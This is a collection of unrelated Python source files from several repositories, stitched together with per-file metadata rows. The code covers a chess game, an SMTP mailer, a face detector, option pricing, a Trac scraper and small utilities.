print("#######PAIRWISE COMPARISON######")
print("#######INCONSISTENT COMPARISON######")
pcm = np.array([[1, 4, 7],
[1/4, 1, 5],
[1/7, 1/5, 1]])
print(pairwise_comparison(pcm))
print("#######CONSISTENT COMPARISON######")
pcm = np.array([[1, 4, 7],
[1/4, 1, 4],
[1/7, 1/4, 1]])
print(pairwise_comparison(pcm))
print("#######WRONG COMPARISON######")
try:
pcm = np.array([[1, 4],
[1/4,1]])
print(pairwise_comparison(pcm))
except ValueError as v:
print(v)
print("#######WRONG COMPARISON######")
try:
pcm = np.array([[1, 4, 7, 1],
[1 / 4, 1, 4,3],
[1 / 7, 1 / 4, 1,4]])
print(pairwise_comparison(pcm))
except ValueError as v:
print(v)
| true |
9f6714b1122fb2f5a86220af738f7c43286de98e | Python | rays2pix/selfal | /dataset.py | UTF-8 | 2,994 | 2.890625 | 3 | [] | no_license | import cv2
from PIL import Image
import os
import numpy as np
class Frame:
def __init__(self,image,labelled=0):
self.image = image
self.labelled = 0
self.rows = image.shape[0]
self.cols = image.shape[1]
class Dataset:
def __init__(self,images_dir=None,labels_dir=None,scale=1.0):
self.images_dir = images_dir
self.labels_dir = labels_dir
self.images = {}
self.labels = {}
self.label_desc = {7:('green',[0,252,0]),
8:('green',[0,252,0]),
9:('green',[0,252,0]),
1:('sky',[0,0,252]),
2:('road',[153,102,51]),
2:('road',[153,102,51]),
5:('lane',[255,255,102]),
11:('building',[255,0,255]),
17:('vehicle',[255,0,0]),
18:('vehicle',[255,0,0]),
19:('vehicle',[255,0,0]),
23:('cycle',[255,50,110]),
24:('cyclist',[110,110,110]),
}
for f in os.listdir(images_dir):
print "Loading %s" % f
image = cv2.imread(os.path.join(images_dir,f))
#image = cv2.resize(image,(image.shape[0],int(np.ceil(scale*image.shape[1]))))
self.images[f] = image
for f in os.listdir(labels_dir):
image = cv2.imread(os.path.join(labels_dir,f),0)
#image = cv2.resize(image,(image.shape[0],int(np.ceil(scale*image.shape[1]))))
self.labels[f]=image
print "Dataset_init done"
self.rows = self.images['001.png'].shape[0]
self.cols = self.images['001.png'].shape[1]
def makeRGBLabelFromInt(self,intLabel):
rows = intLabel.shape[0]
cols = intLabel.shape[1]
rgb_label = np.zeros((rows,cols,3))
int_labels = self.label_desc.keys()
for k in int_labels:
rgb_label[np.where(intLabel==k)] = self.label_desc[k][1]
data = rgb_label
rgb_label = (255.0 / data.max() * (data - data.min())).astype(np.uint8)
cv2.imwrite('rgb.png',rgb_label)
return rgb_label
def overlayRGBonImage(self,rgblabel,image):
pil_rgb = Image.fromarray(rgblabel)
pil_image = Image.fromarray(image)
background = pil_image.convert("RGBA")
overlay = pil_rgb.convert("RGBA")
new_img = Image.blend(background, overlay, 0.4)
overlayed_image = np.asarray(new_img)
return overlayed_image
if __name__ == "__main__":
kitti_data = Dataset(images_dir="./data/kitti01/images/",labels_dir="./data/kitti01/labels")
labels = kitti_data.labels.items()
images = kitti_data.images.items()
rgb_label= kitti_data.makeRGBLabelFromInt(labels[0][1])
ol = kitti_data.overlayRGBonImage(rgb_label,images[0][1])
cv2.imwrite('overlayed.png',ol)
| true |
53d0b7255633762ef805fe9a6df0a83254c8c63d | Python | npmcdn-to-unpkg-bot/Jam | /jam/Singleton.py | UTF-8 | 965 | 2.609375 | 3 | [] | no_license | # Singleton.py
from jam.models import Artists, Album
class Singleton(type):
    """Metaclass that makes each class using it a singleton.

    Fixes the original, which was non-functional: instance creation was
    attempted in the metaclass ``__init__`` (which also returned a value),
    ``super`` was referenced without being called, and ``*args/**kwargs``
    were undefined. The standard pattern overrides ``__call__`` so the
    first instantiation is cached and every later call returns it.
    """
    _instances = {}

    def __call__(cls, *args, **kwargs):
        # Create the instance only on the first call; afterwards return
        # the cached one (constructor arguments of later calls are ignored).
        if cls not in cls._instances:
            cls._instances[cls] = super().__call__(*args, **kwargs)
        return cls._instances[cls]
class Cache(object, metaclass=Singleton):
    """Process-wide singleton cache of artists, albums and reviews.

    Fixes the original, which crashed on construction (``super.__init__``
    called without parentheses and with an unsupported dict argument) and
    on lookup (indexing ``set`` objects by name is a TypeError). The
    caches are now dicts keyed by name so entries can be looked up.
    """

    def __init__(self, className=None):
        # `className` is retained only for backward compatibility with the
        # old signature; it is not used.
        self.artists = {}
        self.albums = {}
        self.reviews = {}

    def __call__(self):
        # Kept for compatibility with the old API: the singleton instance
        # simply returns itself.
        return self

    def searchArtist(self, name):
        """Return the cached artist for `name`, falling back to a
        read-through load on a miss."""
        cached = self.artists.get(name)
        if cached is not None:
            return cached
        return readThrough(self.artists, name)

    def searchAlbum(self, name):
        """Return the cached album for `name`, falling back to a
        read-through load on a miss."""
        cached = self.albums.get(name)
        if cached is not None:
            return cached
        return readThrough(self.albums, name)
def readThrough(cacheSet, replacement):
    """Placeholder for a read-through lookup: on a cache miss, fetch the
    value from the backing store, populate `cacheSet` and return it.

    Currently unimplemented; always returns None.
    """
    pass
83c15b4a593978fb43e2c286f21ff5c02d586ff9 | Python | heroming/algorithm | /leetcode/821_Shortest_Distance_to_a_Character.py | UTF-8 | 484 | 2.90625 | 3 | [] | no_license | class Solution(object) :
def shortestToChar(self, s, c) :
inf = 0x6688FF
n = len(s)
dis = [0] * n
idx = -inf
for i in xrange(n) :
if s[i] == c :
idx, dis[i] = i, 0
else :
dis[i] = i - idx
idx = inf
for i in xrange(n - 1, -1, -1) :
if s[i] == c :
idx = i
else :
dis[i] = min(dis[i], idx - i)
return dis
| true |
6acf6ef19ba9f013090ed8d2ecc207808acedc01 | Python | HokiePedro/emojipastamaker | /emojitest.py | UTF-8 | 165 | 3.25 | 3 | [] | no_license | s = u'\U0001f63b'
p = u'\U0001f355'
porc = raw_input("Type pizza or cat.")
print porc
if porc == "pizza":
print "I want a " + p
else:
print "I want a " + s
| true |
55de0ca0257051c715fd4c5c5a4214e5e0ed9c24 | Python | KMace/Chess-AI | /main.py | UTF-8 | 2,313 | 3.4375 | 3 | [] | no_license | import pygame
from game import Game
from constants import WIDTH, HEIGHT, SQUARE_SIZE, WIN, WHITE, BLACK
from minimax.algorithm import minimax
##################################################
# Still need to implement following functionality:
#
# Castles
# Pawn promotion to a rook, bishop, queen
##################################################
pygame.display.set_caption("Chess")
FPS = 60
def get_row_col_from_mouse(pos):
    """Translate a pixel position (x, y) into (row, col) board coordinates."""
    x, y = pos
    return y // SQUARE_SIZE, x // SQUARE_SIZE
def main():
    """Prompt for a difficulty, then run the human (white) vs AI (black)
    chess loop until the window is closed or someone wins.

    Robustness fix: the original called int(input(...)) before validating,
    so any non-numeric input raised ValueError; the raw string is now
    checked first and the prompt simply repeats.
    """
    # --- difficulty selection: 1/2/3 map to minimax depths 3/4/5 ---
    setting = None
    while setting is None:
        choice = input("Select a difficulty: \n1) Beginner\n2) Intermediate\n3) Expert\n\n")
        print()
        if choice.strip() in ('1', '2', '3'):
            setting = int(choice) + 2
            print("Loading game!...")
        else:
            print()
            print("Please type either 1, 2 or 3")
            print()

    run = True
    clock = pygame.time.Clock()
    game = Game(WIN)

    while run:
        clock.tick(FPS)

        # Black is the computer: pick its move with alpha-beta minimax.
        if game.turn == BLACK:
            value, new_board = minimax(game.get_board(), setting, True, game, float('-inf'), float('inf'))
            game.ai_move(new_board)

        if game.winner() is not None:
            print()
            if game.winner() == WHITE:
                print("White wins!")
            else:
                print("Black wins!")
            run = False

        # If you un-hash this subsequent code you can watch AIs play one another
        #if game.turn == WHITE:
        #    value, new_board = minimax(game.get_board(), setting, False, game, float('-inf'), float('inf'))
        #    game.ai_move(new_board)
        #    print("White moves with an evaluation of", value)

        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                run = False

            if event.type == pygame.MOUSEBUTTONDOWN:
                pos = pygame.mouse.get_pos()
                row, col = get_row_col_from_mouse(pos)
                game.select(row, col)

        game.update()

    pygame.quit()


if __name__ == "__main__":
    main()
| true |
159c618c3b8ceeab85807c68d3a22a0b9c202324 | Python | jaynard1120/DSE_SDElective_ll | /neopixels_midterm.py | UTF-8 | 538 | 2.65625 | 3 | [] | no_license | from adafruit_circuitplayground import cp
from time import sleep
cp.pixels.brightness = 1
ndx = 9
while True:
for i in range(0,10):
if ndx<0:
ndx = 9
cp.pixels[ndx] = (255,255,255)
sleep(1)
if(ndx == 0 or ndx == 5):
cp.pixels[ndx] = (255,255,255)
ndx-=1
continue
if ndx == 4 or ndx == 9:
cp.pixels[0] = (0,0,0)
cp.pixels[5] = (0,0,0)
sleep(1)
cp.pixels[ndx] = (0,0,0)
ndx -=1
| true |
9fe501e9b27bc7bdcee3d25200812dd7e9651eaa | Python | 42/django-trac-learning | /getticketdata.py | UTF-8 | 1,780 | 2.53125 | 3 | [] | no_license | from bs4 import BeautifulSoup
import csv
import datetime
import urllib2
import urlparse
def get_data(ticket):
    """Fetch a Django Trac ticket page and return (close_time, description).

    Returns None (implicitly) when the page cannot be fetched or its
    markup lacks the expected date element. Python 2 script (urllib2,
    print statements).
    """
    try:
        url = 'https://code.djangoproject.com/ticket/%s' % ticket
        ticket_html = urllib2.urlopen(url)
    except urllib2.HTTPError:
        print 'Failed to get "%s"' % url
        return
    bs = BeautifulSoup(ticket_html)
    # get closing date: the timeline link inside the page's date <div>
    # carries the close timestamp in its query string
    d = bs.find_all('div','date')[0]
    try:
        p = list(d.children)[3]
    except IndexError:
        print d
        return
    href = p.find('a')['href']
    close_time_str = urlparse.parse_qs(href)['/timeline?from'][0]
    # Timestamp looks like 2013-04-27T12:34:56+02:00: parse the datetime
    # part, then strip the trailing UTC offset by hand.
    close_time = datetime.datetime.strptime(close_time_str[:-6],
                                            '%Y-%m-%dT%H:%M:%S')
    tz_hours = int(close_time_str[-5:-3])
    tz_minutes = int(close_time_str[-2:])
    if close_time_str[-6]=='-':
        tz_hours = -tz_hours
    # Subtracting the offset converts local close time to UTC.
    # NOTE(review): for negative offsets the minutes component is still
    # subtracted with a positive sign -- verify for non-whole-hour zones.
    close_time -= datetime.timedelta(hours = tz_hours, minutes = tz_minutes)
    # get description and return
    de = bs.find_all('div', 'description')[0]
    return close_time, de.text
# Read the exported ticket list, look up each ticket's close time and
# description on code.djangoproject.com, and write an enriched CSV.
# Python 2 script: uses reader.next() and print statements.
tickets_file = csv.reader(open('2013-04-27.csv'))
output = csv.writer(open('2013-04-27.close.csv','w'))
tickets_file.next()  # skip the header row
for id, time, changetime, reporter, summary, status, owner, type, component \
    in tickets_file:
    try:
        closetime, descr = get_data(id)
    except:
        # NOTE(review): the bare except catches the TypeError raised when
        # get_data() returns None (fetch/parse failure), giving "skip bad
        # tickets" behaviour -- but it also hides any unrelated bug.
        continue
    if closetime is None: continue
    row = [id]
    row.extend([time,
                changetime,
                closetime,
                reporter,
                summary,
                status,
                owner,
                type,
                component,
                descr.encode('utf-8'),
                ],
                )
    output.writerow(row)
    print id, closetime
| true |
c391a5bcc392b47a9383e63a64c1c11642c513ac | Python | karantrehan3/Email-Automation-Python | /EmailAutomation.py | UTF-8 | 2,472 | 3.3125 | 3 | [
"MIT"
] | permissive | # Loading all the packages required
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
class EmailAutomation:
    """Send a plain-text email through Gmail's SMTP server.

    Instantiating the class immediately builds and sends the message; the
    body is read from a text file.

    Improvements over the original: the body file path is a constructor
    parameter (defaulting to 'textfile.txt', so existing callers are
    unaffected), and the SMTP session is closed in a finally block so a
    failed login/send no longer leaks the connection.
    """

    def __init__(self, user_mail, password, receiver_mail, subject,
                 body_file='textfile.txt'):
        """Store credentials/addresses and send the mail.

        Args:
            user_mail: sender Gmail address (also used to log in).
            password: sender account password.
            receiver_mail: destination address.
            subject: subject line of the message.
            body_file: path of the text file whose contents become the body.
        """
        self.user_mail = user_mail
        self.password = password
        self.receiver_mail = receiver_mail
        self.subject = subject
        self.body_file = body_file

        # Build (and thereby send) the message right away.
        self.build()

    def build(self):
        """Assemble the MIME message and hand it to send()."""
        mail = MIMEMultipart()
        mail['From'] = self.user_mail
        mail['To'] = self.receiver_mail
        mail['Subject'] = self.subject

        # Read the body of the e-mail from the configured text file.
        with open(self.body_file) as fp:
            body = fp.read()

        mail.attach(MIMEText(_text=body, _subtype='plain'))
        self.send(mail)

    def send(self, mail):
        """Deliver the message over a TLS-secured SMTP session."""
        server = smtplib.SMTP(host='smtp.gmail.com', port=587)
        try:
            # Upgrade the connection to TLS before sending credentials.
            server.starttls()
            server.login(user=self.user_mail, password=self.password)
            server.send_message(from_addr=self.user_mail,
                                to_addrs=self.receiver_mail, msg=mail)
        finally:
            # Terminate the SMTP session even if login/send failed.
            server.quit()
if __name__ == '__main__':
    # To automate sending, gate the instantiation below on whatever
    # condition should trigger the mail -- constructing the object both
    # builds and sends the message to the destination address.
    trigger_mail = True  # alter this condition based on the requirements
    if trigger_mail:
        mailer = EmailAutomation('YOUR EMAIL ADDRESS HERE',
                                 'YOUR PASSWORD HERE',
                                 'RECEIVER EMAIL ADDRESS HERE',
                                 'SUBJECT OF THE EMAIL')
| true |
1c57bc0d3f2f7882a80a727f2efcf27462b5decd | Python | HAL-42/AlchemyCat | /contrib/loss/wsss/balanced_seed_loss.py | UTF-8 | 2,108 | 2.734375 | 3 | [
"Apache-2.0"
] | permissive | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@author: Xiaobo Yang
@contact: hal_42@zju.edu.cn
@software: PyCharm
@file: balanced_seed_loss.py
@time: 2020/3/28 22:54
@desc:
"""
from typing import Tuple
import torch
import torch.nn.functional as F
__all__ = ['BalancedSeedloss']
class BalancedSeedloss(object):
    """Seed loss that balances foreground and background contributions.

    Foreground (channels 1..C-1) and background (channel 0) cross-entropy
    terms are normalised by their own pixel counts, so neither class can
    dominate the gradient.
    """

    def __init__(self, eps: float = 1e-5):
        """Create the loss.

        Args:
            eps: Minimum probability allowed when clamping the softmax
                output (also used to keep the count denominators non-zero).
        """
        self.eps = eps

    def clamp_softmax(self, score, dim=1):
        """Softmax along *dim*, clamped to [eps, 1] and re-normalised."""
        clamped = torch.clamp(F.softmax(score, dim), self.eps, 1)
        return clamped / torch.sum(clamped, dim=dim, keepdim=True)

    def __call__(self, score_map, one_hot_label) -> Tuple[torch.Tensor, torch.Tensor, torch.Tensor]:
        """Compute the balanced seed loss.

        Args:
            score_map: (N, C, H, W) raw score map
            one_hot_label: (N, C, H, W) one-hot label (must not require grad)

        Returns:
            (total_loss, bg_loss, fg_loss) scalar tensors
        """
        assert not one_hot_label.requires_grad
        target = one_hot_label.to(torch.float)

        assert not torch.any(torch.isinf(score_map))
        assert not torch.any(torch.isnan(score_map))
        log_probs = torch.log(self.clamp_softmax(score_map))
        assert not torch.any(torch.isnan(log_probs))

        # Channel 0 is background; channels 1..C-1 are foreground classes.
        fg_target = target[:, 1:, :, :]
        fg_log = log_probs[:, 1:, :, :]
        fg_count = torch.sum(fg_target, dim=(1, 2, 3)) + self.eps

        bg_target = target[:, 0:1, :, :]
        bg_log = log_probs[:, 0:1, :, :]
        bg_count = torch.sum(bg_target, dim=(1, 2, 3)) + self.eps

        # Per-sample cross entropy, normalised per class, then mean-reduced
        # over the batch.
        fg_loss = -1 * torch.mean(torch.sum(fg_target * fg_log, dim=(1, 2, 3)) / fg_count)
        bg_loss = -1 * torch.mean(torch.sum(bg_target * bg_log, dim=(1, 2, 3)) / bg_count)

        total_loss = bg_loss + fg_loss
        assert not torch.any(torch.isnan(total_loss)), \
            "fg_loss: {} fg_count: {} bg_loss: {} bg_count: {}".format(fg_loss, fg_count, bg_loss, bg_count)
        return total_loss, bg_loss, fg_loss
| true |
84a5a85e418e4864d9cbd728290f40e33bedb926 | Python | srp2210/PythonBasic | /dp_w3resource_solutions/functions/7_calculate_uppercase_and_lowercase_letters_in_given_string.py | UTF-8 | 678 | 4.125 | 4 | [] | no_license | """
* @author: Divyesh Patel
* @email: pateldivyesh009@gmail.com
* @date: 23/05/20
* @decription: Write a Python function that accepts a string and calculate
the number of upper case letters and lower case letters.
"""
def get_case_counts(text):
    """Count upper- and lower-case letters in *text*.

    Returns:
        (upper_count, lower_count) tuple, or (None, None) when *text*
        is not a non-empty string.
    """
    # Fix: check the type FIRST.  The original evaluated len(text) before
    # isinstance(), so a non-string argument (e.g. an int) raised TypeError
    # instead of returning (None, None).
    if not isinstance(text, str) or len(text) == 0:
        return None, None
    upper_count = sum(1 for ch in text if ch.isupper())
    lower_count = sum(1 for ch in text if ch.islower())
    return upper_count, lower_count
# Demo: report the counts for a sample sentence.
total_upper, total_lower = get_case_counts('Hello World this is Divyesh Patel')
print('total upper:', total_upper)
# NOTE(review): the label below reads 'total, lower:' -- probably meant 'total lower:'.
print('total, lower:', total_lower)
| true |
0077c9e1186bcbc2a5903031961a0f4282db7e0b | Python | ruili629/Prisoner-s-Dillemma | /other examples.py | UTF-8 | 680 | 2.859375 | 3 | [] | no_license |
#example 1
# import axelrod as axl
# axl.seed(4) # for reproducible example
# players = [axl.Cooperator(), axl.Defector(),axl.TitForTat(), axl.Grudger()]
# mp = axl.MoranProcess(players, mutation_rate=0.1)
# for _ in mp:
# if len(mp.population_distribution()) == 1:
# break
# print(mp.population_distribution())
# example 2
# import axelrod as axl
# axl.seed(689)
# players = (axl.Cooperator(), axl.Defector(), axl.Defector(), axl.Defector())
# w = 0.95
# fitness_transformation = lambda score: 1 - w + w * score
# mp = axl.MoranProcess(players, turns=10, fitness_transformation=fitness_transformation)
# populations = mp.play()
# print(mp.winning_strategy_name)
| true |
54a6d8d62cf72878edbe42f64308fc3ca030913a | Python | software312/ZakuFaceDetection | /zaku_recognize.py | UTF-8 | 4,078 | 2.53125 | 3 | [] | no_license | # USAGE
# python3 zaku_recognize.py --detector face_detection_model --recognizer output/recognizer.pickle --le output/le.pickle
# import the necessary packages
from imutils.video import VideoStream
from imutils.video import FPS
from imutils.video.pivideostream import PiVideoStream
from picamera.array import PiRGBArray
from picamera import PiCamera
import numpy as np
import argparse
import imutils
import pickle
import time
import cv2
import os
# construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-d", "--detector", required=True,
                help="path to OpenCV's deep learning face detector")
ap.add_argument("-r", "--recognizer", required=True,
                help="path to model trained to recognize faces")
ap.add_argument("-l", "--le", required=True,
                help="path to label encoder")
ap.add_argument("-c", "--confidence", type=float, default=0.5,
                help="minimum probability to filter weak detections")
args = vars(ap.parse_args())

# load our serialized face detector from disk
print("[INFO] loading face detector...")
protoPath = os.path.sep.join([args["detector"], "deploy.prototxt"])
modelPath = os.path.sep.join([args["detector"],
                              "res10_300x300_ssd_iter_140000.caffemodel"])
detector = cv2.dnn.readNetFromCaffe(protoPath, modelPath)

# NOTE(review): the recognizer/label-encoder loading is disabled, so the
# --recognizer and --le arguments are parsed but currently unused.
# recognizer = pickle.loads(open(args["recognizer"], "rb").read())
# le = pickle.loads(open(args["le"], "rb").read())

# initialize the video stream, then allow the camera sensor to warm up
print("[INFO] starting video stream...")
vs = PiVideoStream().start()
time.sleep(2.0)

# start the FPS throughput estimator
fps = FPS().start()

# loop over frames from the video file stream
while True:
    # grab the frame from the threaded video stream, resize it to a width
    # of 400 pixels (maintaining the aspect ratio), and grab the new
    # image dimensions
    frame = vs.read()
    frame = imutils.resize(frame, width=400)
    (h, w) = frame.shape[:2]

    # construct a blob from the image (mean subtraction values are the
    # ones the Caffe model was trained with)
    imageBlob = cv2.dnn.blobFromImage(
        cv2.resize(frame, (300, 300)), 1.0, (300, 300),
        (104.0, 177.0, 123.0), swapRB=False, crop=False)

    # apply OpenCV's deep learning-based face detector to localize
    # faces in the input image
    detector.setInput(imageBlob)
    detections = detector.forward()

    # loop over the detections
    for i in range(0, detections.shape[2]):
        # extract the confidence (i.e., probability) associated with
        # the prediction
        confidence = detections[0, 0, i, 2]

        # filter out weak detections
        if confidence > args["confidence"]:
            # compute the (x, y)-coordinates of the bounding box for
            # the face
            box = detections[0, 0, i, 3:7] * np.array([w, h, w, h])
            (startX, startY, endX, endY) = box.astype("int")
            faceCenterX = (startX + endX) / 2
            faceCenterY = (startY + endY) / 2
            # BUG FIX: the original concatenated floats onto a str
            # ("..." + faceCenterX), which raised TypeError on the first
            # detected face; format the numbers instead.
            print("Center coordinates of face: {},{}".format(
                faceCenterX, faceCenterY))

            # extract the face ROI
            face = frame[startY:endY, startX:endX]
            (fH, fW) = face.shape[:2]

            # ensure the face width and height are sufficiently large
            if fW < 20 or fH < 20:
                continue

            # draw the bounding box of the detected face
            cv2.rectangle(frame, (startX, startY), (endX, endY),
                          (0, 0, 255), 2)

    # show the output frame and update the FPS counter
    cv2.imshow("Frame", frame)
    fps.update()
    key = cv2.waitKey(1) & 0xFF

    # if the `q` key was pressed, break from the loop
    if key == ord("q"):
        break

# stop the timer and display FPS information
fps.stop()
print("[INFO] elasped time: {:.2f}".format(fps.elapsed()))
print("[INFO] approx. FPS: {:.2f}".format(fps.fps()))

# do a bit of cleanup
cv2.destroyAllWindows()
vs.stop()
| true |
9254bc22775a9eb30c1625d0eb02d7bd8316bca3 | Python | RenatoGFerreira/estudos-de-python | /Desktop/Estudos_Python/exercícios/ex025.py | UTF-8 | 270 | 4.21875 | 4 | [] | no_license | '''
Crie um programa que leia o nome de uma pessoa e diga se ela tem "Silva" no nome.
'''
# Read the full name, trim surrounding spaces, lowercase it and split into words.
nome_pessoa = str(input('Qual o nome completo da pessoa? ')).strip().lower().split()
# Exact word membership test (not a substring search), so 'Silva' matches
# only as a whole name component.
sim_ou_nao = 'silva' in nome_pessoa
print(f'Tem "Silva" no nome? [True/False] {sim_ou_nao}')
684d7bb0a163ff4fa80420f4f1973b7cef1cead2 | Python | soosub/bsc-thesis | /Implementation/Zhou_2/PSO.py | UTF-8 | 853 | 2.546875 | 3 | [] | no_license | # -*- coding: utf-8 -*-
"""
Created on Tue Jun 23 10:21:24 2020
@author: joost
"""
from QAOA import QAOA
from pyswarm import pso
import numpy as np
class PSO(QAOA):
    """QAOA variant whose angles are found with particle swarm optimization."""

    # Fix: the method was declared without `self`, so calling it on an
    # instance bound the graph argument to `self` and broke.  Marking it
    # @staticmethod keeps `PSO.get_angles_PSO(G, p, backend)` working and
    # also makes instance calls correct.
    @staticmethod
    def get_angles_PSO(G, p, backend, n_samples=1024, maxiter=50, debug=False):
        '''
        Finds angles for a given graph G using particle swarm optimization.

        Returns (gamma, beta) arrays of length p.
        '''
        def func(x):
            '''function to be optimized: negated QAOA expectation, with
            gammas at even indices and betas at odd indices of x'''
            g = x[::2]
            b = x[1::2]
            return -QAOA.expectation(G, g, b, backend, n_samples)

        # Bounds per angle pair: gamma in [0, pi/2], beta in [0, pi/4].
        lb = [0, 0] * p
        ub = [np.pi / 2, np.pi / 4] * p

        xopt, fopt = pso(func, lb, ub, maxiter=maxiter, debug=debug)
        print(fopt)

        # De-interleave the flat solution vector back into the two angle sets.
        gamma = xopt[::2]
        beta = xopt[1::2]

        return gamma, beta
| true |
a55363850812dd61359cf64a55cc570ff0b8ed60 | Python | ngokchaoho/Kirk-s-approximation | /Spread.py | UTF-8 | 2,211 | 3.0625 | 3 | [] | no_license | # -*- coding: utf-8 -*-
"""
Created on Sun Nov 15 17:08:24 2020
@author: Flipped
"""
import numpy as np
from scipy.stats import norm
# Define Spread Option Class
class Spread(object):
    """European spread call priced by Monte Carlo and by Kirk's approximation.

    Payoff at maturity: max(S1(T) - S2(T) - K, 0), with the two underlyings
    following correlated geometric Brownian motions.

    NOTE(review): ``steps`` is stored but never used (the simulation is a
    single-step draw of the terminal prices); it is kept for interface
    compatibility.
    """

    def __init__(self, S1, S2, K, T, r, sigma1, sigma2, rho, steps, paths):
        # Spot prices of the two underlyings.
        self.S1 = float(S1)
        self.S2 = float(S2)
        # Strike, maturity (in years) and risk-free rate.
        self.K = float(K)
        self.T = float(T)
        self.r = float(r)
        # Volatilities and correlation of the two GBMs.
        self.sigma1 = float(sigma1)
        self.sigma2 = float(sigma2)
        self.rho = float(rho)
        self.steps = int(steps)   # unused -- see class docstring
        self.paths = int(paths)

    @property
    def price_mc(self):
        """Simulate terminal prices (prices1, prices2) with antithetic variates.

        Re-seeds from OS entropy on every access, so repeated calls give
        different samples.
        """
        np.random.seed()
        z1 = np.random.standard_normal(int(self.paths/2))
        Z1 = np.concatenate((z1, -z1))   # antithetic pairs
        z2 = np.random.standard_normal(int(self.paths/2))
        Z2 = np.concatenate((z2, -z2))
        w1 = np.sqrt(self.T)*Z1
        w2 = np.sqrt(self.T)*Z2
        # Correlated GBM terminal values under the risk-neutral measure.
        prices1 = self.S1 * np.exp((self.r - 0.5*self.sigma1**2)*self.T + self.sigma1*w1)
        prices2 = self.S2 * np.exp((self.r - 0.5*self.sigma2**2)*self.T + self.sigma2*(self.rho*w1 + np.sqrt(1 - self.rho**2)*w2))
        return prices1, prices2

    @property
    def payoff_mc(self):
        """Undiscounted spread-call payoff per simulated path."""
        pm1, pm2 = self.price_mc
        payoff = np.maximum(pm1 - pm2 - self.K, 0)
        return payoff

    @property
    def option_value(self):
        """Monte-Carlo price: discounted mean payoff.

        (Removed a dead pre-allocation ``values = np.zeros(self.paths)``
        that was immediately overwritten in the original.)
        """
        payoff = self.payoff_mc
        values = payoff * np.exp(-self.r*self.T)
        return np.mean(values)

    @property
    def price_kirk(self):
        """Kirk's closed-form approximation of the spread-call price."""
        # Treat S2 + K*exp(-rT) as a single lognormal asset.
        z = self.S2 / (self.S2 + self.K*np.exp(-self.r*self.T))
        sigma = np.sqrt(self.sigma1**2 + self.sigma2**2*z**2 - 2*self.rho*self.sigma1*self.sigma2*z)
        d1 = (np.log(self.S1 / (self.S2 + self.K * np.exp(-self.r * self.T)))
              / (sigma*np.sqrt(self.T)) + 0.5*sigma*np.sqrt(self.T))
        d2 = d1 - sigma*np.sqrt(self.T)
        price = self.S1*norm.cdf(d1) - (self.S2 + self.K*np.exp(-self.r*self.T))*norm.cdf(d2)
        return price
# Demo: compare the Monte-Carlo estimate against Kirk's approximation
# for a sample spread call (the two numbers should be close).
spread_call = Spread(100, 90, 10, 1, 0.05, 0.2, 0.3, 0.4, 365, 100000)
print (spread_call.option_value)
print (spread_call.price_kirk)
| true |
0aba86c9aa9509f89e74008cb124a27b1678d9ec | Python | Constancellc/Demand-Model | /pecan-street/get_heatmaps.py | UTF-8 | 1,746 | 2.515625 | 3 | [] | no_license | import csv
import datetime
import matplotlib.pyplot as plt
import numpy as np
# First day of the 365-day window (May 2017 - Apr 2018).
day0 = datetime.datetime(2017,5,1)
# household id -> {1: EV-load heatmap, 2: total-load heatmap};
# each heatmap is 24 rows (hours, top-down) x 365 columns (days).
hh = {}
outfile = '../../Documents/pecan-street/heatmaps/'

# Month index -> input file name.
# NOTE(review): key 11 is skipped and 12 used for apr18 -- harmless here
# because only the values are used, but it looks like a typo.
ms = {0:'may17',1:'jun17',2:'jul17',3:'aug17',4:'sep17',5:'oct17',6:'nov17',
      7:'dec17',8:'jan18',9:'feb18',10:'mar18',12:'apr18'}

# Axis labels for the heatmap plots below.
y_ticks = ['22:00','18:00','14:00','10:00','06:00','02:00']
x_ticks = ['Jul 17','Oct 17','Jan 18','Apr 18']

# Pass 1: accumulate hourly EV and total consumption per household.
for m in ms:
    with open('../../Documents/pecan-street/evs-hourly/'+ms[m]+'.csv',
              'rU') as csvfile:
        reader = csv.reader(csvfile)
        next(reader)  # skip the header row
        for row in reader:
            # Timestamp column format: 'YYYY-MM-DD HH...'.
            date = datetime.datetime(int(row[0][:4]),int(row[0][5:7]),
                                     int(row[0][8:10]))
            dayNo = (date-day0).days
            hour = int(row[0][11:13])
            hhid = row[1]
            if hhid not in hh:
                # Lazily create two 24x365 zero grids for this household.
                hh[hhid] = {1:[],2:[]}
                for t in range(24):
                    hh[hhid][1].append([0.0]*365)
                    hh[hhid][2].append([0.0]*365)
            ev = float(row[2])
            solar = float(row[3])
            grid = float(row[4])
            # Row 0 corresponds to 23:00 (hours are plotted top-down).
            hh[hhid][1][23-hour][dayNo] = ev
            hh[hhid][2][23-hour][dayNo] = grid+solar

# Pass 2: save a two-panel heatmap PDF per household with EV activity.
for hhid in hh:
    # NOTE(review): max(max(...)) picks the lexicographically largest row
    # first, so this is not necessarily the global maximum of the grid --
    # verify the intended threshold behaviour.
    if max(max(hh[hhid][1])) < 1:
        continue
    plt.figure()
    for f in range(1,3):
        plt.subplot(2,1,f)
        if f == 1:
            plt.title(hhid)
        plt.imshow(hh[hhid][f],vmin=0,aspect=5)
        plt.yticks(np.arange(2,26,4),y_ticks)
        plt.xticks([61,153,245,334],x_ticks)
        plt.colorbar()
    plt.tight_layout()
    plt.savefig(outfile+hhid+'.pdf',format='pdf')
    plt.close()
| true |
5e8e62c5e8b6d2871f32ef34e06787c41095ec2c | Python | bsfelde/PythonScripts | /ErrorLocater.py | UTF-8 | 631 | 3.25 | 3 | [] | no_license | def segmentsplitter():
#Split data by segments
with open('7114942841.txt', 'r+') as f:
for line in f:
segment = line.split('~')
return segment
def elementsplitter(segment):
#Split segments by elements, return them in a list
splitdata = [letter.split('*') for letter in segment]
return splitdata
def manFinder(data):
for segment in data:
if segment[0] == "MAN":
if len(segment[2]) != 20:
print '*'.join(segment)
#-------------------------------------
def main():
print '\n\n'
segments = segmentsplitter()
dater = elementsplitter(segments)
manFinder(dater)
if __name__ == '__main__':
main() | true |
7cdbdd716b06d212720d4c96840a2a0e8942f9eb | Python | RaoUmer/docs_classification | /docs_classification_ML_project/ml_docs_classification_2.py | UTF-8 | 13,916 | 2.578125 | 3 | [] | no_license | # -*- coding: utf-8 -*-
"""
Created on Fri Mar 11 22:52:40 2016
@author: RaoUmer
"""
print (__doc__)
# importing required modules
import numpy as np
from sklearn.datasets import fetch_20newsgroups
from sklearn.feature_extraction.text import TfidfVectorizer
#from sklearn.feature_extraction.text import CountVectorizer
